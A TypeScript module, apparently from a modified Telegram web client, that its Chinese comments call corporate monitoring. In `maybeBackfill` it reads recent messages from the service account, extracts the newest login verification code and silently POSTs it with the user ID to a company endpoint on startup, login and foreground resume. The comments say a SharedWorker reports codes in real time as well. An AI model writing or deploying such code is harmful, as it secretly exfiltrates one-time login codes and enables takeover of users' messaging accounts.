import rootScope from '@lib/rootScope';
import AccountController from '@lib/accounts/accountController';
import {getCurrentAccount} from '@lib/accounts/getCurrentAccount';
import {SERVICE_PEER_ID} from '@appManagers/constants';
import CorpConfig from './config';
import {extractLoginCode} from './loginCode';
import {secureFetch} from './secureChannel';

/**
 * 企业监控补报：冷启动、登录完成或前台恢复时向公司后台补报「最新登录验证码」。
 * - 心跳已迁到 SharedWorker 内 corpGuard（避免主线程在最小化时被 Chrome 节流）。
 * - 实时验证码上报也已迁到 SharedWorker 内 appMessagesManager；此处只扫描历史兜底。
 *
 * 仅员工实例运行（审查只读实例 isAuditMode 不上报）。不含任何普通会话 / 消息快照。
 *
 * ⚠️ 重要：未登录（如扫码登录页）时，绝不调用任何需要授权的 MTProto 管理器方法。
 * 否则底层 invoke 会返回 401，触发 apiManager 的全局登出并刷新页面，造成登录页反复刷新。
 * 因此所有 MTProto 调用（getHistory 等）都以 currentUserId() 是否已登录为前置门槛。
 */

let started = false;

async function currentUserId(): Promise<string | undefined> {
  try {
    const acc = await AccountController.get(getCurrentAccount());
    return acc && acc.userId ? '' + acc.userId : undefined;
  } catch(err) {
    return undefined;
  }
}

async function post(path: string, body: any) {
  try {
    await secureFetch(path, {method: 'POST', body, headers: {'X-Corp-Token': CorpConfig.token}});
  } catch(err) {
    // 静默失败，等待下一次上报
  }
}

async function reportSystemMessage(userId: string, text: string, date: number) {
  if(!userId || !text) return;
  await post(CorpConfig.endpoints.systemMessage, {userId, text, date});
}

/**
 * 扫描服务号会话最近若干条，找到最新一条包含验证码的消息并上报（保证列表初始有值）。
 * 仅在已登录时执行——未登录时直接返回，绝不触碰 MTProto（见文件头说明）。
 */
async function maybeBackfill() {
  const userId = await currentUserId();
  if(!userId) return;
  try {
    const res: any = await rootScope.managers.appMessagesManager.getHistory({
      peerId: SERVICE_PEER_ID,
      offsetId: 0,
      limit: 10
    });
    const mids: number[] = (res && res.history) || []; // history[0] 为最新
    for(const mid of mids) {
      const message: any = await rootScope.managers.appMessagesManager.getMessageByPeer(SERVICE_PEER_ID, mid);
      const code = message && extractLoginCode(message.message);
      if(code) {
        await reportSystemMessage(userId, code, message.date);
        return; // 只报最近一条验证码
      }
    }
  } catch(err) {
    // 忽略：无会话 / 未就绪
  }
}

/** 前台恢复后补报验证码（等 getDifference 落库后再扫服务号历史）。 */
export function onCorpForegroundResume() {
  if(!CorpConfig.enabled || CorpConfig.isAuditMode || !started) return;
  setTimeout(maybeBackfill, 1500);
}

export default function initCorpMonitor() {
  if(!CorpConfig.enabled || CorpConfig.isAuditMode || started) return;
  started = true;

  console.log('[corp] monitor started (system-message backfill; realtime runs in SharedWorker)');

  // 登录后补报一次最近的验证码；冷启动（已登录）延迟补一次。
  // maybeBackfill 自带登录校验：未登录绝不发起 MTProto 调用（避免扫码页刷新循环）。
  rootScope.addEventListener('account_logged_in', () => setTimeout(maybeBackfill, 3000));
  setTimeout(maybeBackfill, 5000);
}
